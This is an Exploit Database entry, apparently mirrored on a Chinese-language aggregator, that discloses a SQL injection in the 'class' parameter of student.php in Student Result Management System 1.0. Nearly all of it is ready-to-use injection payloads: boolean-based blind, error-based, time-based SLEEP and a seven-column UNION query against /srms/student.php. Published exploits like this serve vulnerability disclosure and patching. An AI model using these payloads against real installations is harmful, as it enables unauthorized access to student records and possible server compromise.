Student Result Management System 1.0 – ‘class’ SQL Injection

• Exploit Database
• 118 阅读

• 作者： Riadh Benlamine
  日期： 2021-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49974/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: Student Result Management System 1.0 - &apos;class&apos; SQL Injection # Date: 09.09.2020 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage : https://projectworlds.in # Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/ # Version: 1.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.   The vulnerable parameter uri: /srms/student.php?class=<injection point>   exploit:   Parameter: class (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: class=-6346&apos; OR 3657=3657#&rn=1   Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: class=1&apos; OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1   Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: class=1&apos; AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1   Type: UNION query Title: MySQL UNION query (random number) - 7 columns Payload: class=1&apos; UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1